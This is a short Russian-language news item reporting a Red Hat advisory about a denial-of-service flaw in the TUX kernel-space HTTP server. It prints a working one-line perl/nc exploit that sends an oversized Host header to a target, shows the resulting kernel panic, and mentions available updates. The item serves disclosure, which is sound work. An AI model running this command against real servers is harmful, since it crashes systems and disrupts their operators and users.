Сегодня RH опубликовала сведения о том, что в Kernel-Space HTTP server TUX обнаружена дыра, позволяющая осуществить D.O.S атаку на сервер. Простейший exploit, демонстрирующий данную дырку таков:
perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>
Данный скрипт приводит вот к чему (слегка подредактировано):
Code: Bad EIP Value.
(0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!
После чего спасает только Reset ...
апдейты для RH-систем доступны там же ...
>>> Подробности тут.